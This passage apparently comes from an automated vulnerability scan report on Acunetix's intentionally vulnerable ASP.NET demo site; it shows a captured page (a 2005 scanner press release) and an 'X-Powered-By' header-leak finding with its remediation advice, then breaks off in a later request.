dENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        37. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
